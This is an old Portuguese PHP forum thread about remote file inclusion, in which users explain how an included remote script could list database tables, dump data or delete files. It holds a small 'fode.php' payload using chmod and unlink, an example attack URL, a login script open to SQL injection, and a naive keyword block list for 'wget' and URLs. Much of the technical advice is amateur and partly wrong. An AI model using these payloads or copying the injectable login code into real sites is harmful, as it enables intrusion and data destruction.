42 replies to this topic

[Stormbringer]

Não entendi como o hacker faz a pagina pra aparecer os codigos...

www.site.com.br/site.php?pagina=http://site.com/codigomalicioso.php

Como seria essa pagina "codigomalicioso.php"?
Expliquem como seria e deem um exemp0lo se puderem...

bom, imagine que vc, na sua pagina, carrega as configuraçoes pra conexao do seu banco de dados.

e o cara carregue um codigo malicioso assim:

<?
$querydomal="show tables";
blablabla
?>

ele fica sabendo as tabelas que vc tem... aí ele faz outro script, jah sabendo o nome das tabelas

<?
$querydomal="select * from tabelacomdadosimportantes";
blablabla
?>

enfim, isso é apenas o exemplo mais comum, de conexao com o banco de dados... pode acontecer coisas ainda piores se vc carregar um script com configuraçoes de ftp... enfim, depende do que vc carrega no seu site e da imaginação do hacker...

fica sabendo tudo o que vc tem... alem de poder dar update, delete e outras coisas

[thiagorsl]

Não entendi como o hacker faz a pagina pra aparecer os codigos...

www.site.com.br/site.php?pagina=http://site.com/codigomalicioso.php

Como seria essa pagina "codigomalicioso.php"?
Expliquem como seria e deem um exemp0lo se puderem...

Eu não vou dar exemplo mas não sei qual é a sua intenção com eles ......

Vou dar ideias .....

Você não pdoe fazer um arquivos php que apaga arquivos ??

Você não pode fazer arquivos php que mostrem outros arquivos ??

Você não pode fazer arquivos php que apaguem o banco de dados ??

E qualquer desses arquivos você pode usar como include que é feito assim qeu é usado o kra faz o script e pronto ferra tudo ...

[Hyoga de Cisne]

Atah mas pra isso aocntecer precisa ter uma conexão já feita
E outra coisa, não daria certo pq o include é local não funcionaria:
.com.br/site.php?pagina=http://site.com/codigomalicioso.php

[thiagorsl]

Atah mas pra isso aocntecer precisa ter uma conexão já feita
E outra coisa, não daria certo pq o include é local não funcionaria:
.com.br/site.php?pagina=http://site.com/codigomalicioso.php

Quem disse pra você que o include é local ??? o include não é local...

Você precisaria de uma conexão já feita certo ??

Normalmente você já fez isso antes de chamar o include ou seja a conexão com o banco de dados já esta feita a muito tempo ....

[dark sonic]

Bom galera esse post sobre segurança eh rox. pra aproveitar vejam um pequeno sistema de login que eu uso em meus scripts. (feito por mim) no qual você verifica senha e login e o nivel do usuario, e as informações do login e nivel ficam guardados em uma session pra depois redirecionar para a pagina desejada.

<?
require "config.inc";
if ($acao=='login') {
$sql = mysql_query("SELECT nivel FROM usuarios WHERE login='$login' and senha='$password' and ver='on' ");
$total= mysql_fetch_array($sql);
$nivel = $total['nivel'];
if(empty($total)){
echo "<script language=javascript>alert (\"login ou senha incorretos !!\");</script>";
} else{
session_start("login");
if(!isset($s)){
$s=md5(uniqid(microtime()));
session_name($s);
}
$_SESSION[ "login" ]= "$login";
$_SESSION[ "nivel" ]= "$nivel";
header ("Location: painel.php?acao=logado&sid=$s"); } } ?>
<?
$verifica = ereg("http|ftp|https|www|wget", $_GET[acao]);
if ($verifica)
echo "<script language=javascript>alert (\"Imperium Guard v0.1b :: Sistema de segurança anti hacker's ativado !!\");</script>";
?>

Se alguem quiser me ajudar a implementar a segunraça desse pequeno código de login fico grato

[Hyoga de Cisne]

Por exemplo, daria certo se fosse assim?
.com.br/site.php?pagina=http://site.com/codigomalicioso.php
e no codigomalicioso.php teria
unlike("site.php");
se o include naum é local deveria funcionar naum? ¬¬

[Stormbringer]

Por exemplo, daria certo se fosse assim?
.com.br/site.php?pagina=http://site.com/codigomalicioso.php
e no codigomalicioso.php teria
unlike("site.php");
se o include naum é local deveria funcionar naum? ¬¬

se site.php estiver com chmod 777, funcionaria, jah que a pagina externa esta sendo chamada dentro de um arquivo no servidor, e isso torna a execução local...

[thiagorsl]

Por exemplo, daria certo se fosse assim?
.com.br/site.php?pagina=http://site.com/codigomalicioso.php
e no codigomalicioso.php  teria
unlike("site.php");
se o include naum é local deveria funcionar naum? ¬¬

se site.php estiver com chmod 777, funcionaria, jah que a pagina externa esta sendo chamada dentro de um arquivo no servidor, e isso torna a execução local...

Ou seja é muito fácil fazer isso já que o prórpio PHP consegue setar o chmod .....

[Hyoga de Cisne]

Então basta fazer:
chmod("777", "site.php");
unlink("site.php");
certo?

[thiagorsl]

Então basta fazer:
chmod("777", "site.php");
unlink("site.php");
certo?

Seria correto se ua sintaxe estiver correta pórem sua sintaxe está errada dá uma olhada no php.net como funciona a função chmod .... http://www.php.net/chmod

[Stormbringer]

Então basta fazer:
chmod("777", "site.php");
unlink("site.php");
certo?

bom, vc só pode dar chmod num arquivo de sua propriedade(a nao ser que ele jah tenha um chmod que permita modificaçao de outro usuario)... se site.php foi "subido" pelo ftp(cute-fpt, ws, etc), com user e senha, nao é do mesmo dono do "script www" subido como moveuploadedfile, na qual a função chmod e unlink trabalham...
logica basica...

bom, topicos assim aguçam a curiosidade, pq a molecada adora brincar e testar coisas supostamente hacker, heheh

bom, foram dadas dicas de como se proteger, como atacar, acontece se "isso ou se aquilo", bem, vamos parar por aqui, heheh

[Hyoga de Cisne]

Bem isso pelo q eu vi nmaum dá certo naum precisa ter medo, olhem o teste que fiz no meu site:

http://wians.redserv...quivo=index.php

olhem o arquivo fode.php
<?
$a = "$arquivo";
chmod("$a", "777");
unlink("$a");
?>

[Hyoga de Cisne]

Alguem sabe se isso foi erro do codigo ou se isso não da certo mesmo?

[_error_log_]

Alguem sabe se isso foi erro do codigo ou se isso não da certo mesmo?

kra o codigo nao ta errado.. mais a query string ai do site da vitima nao é o tipo ?area=arquivo.php ... entao nao da certo.... eu axo..

[Hyoga de Cisne]

O site é meu eu fiz apenas o teste, a query é +- assim:

include
$arquivo = "$page";
$arquivo.php
sacou?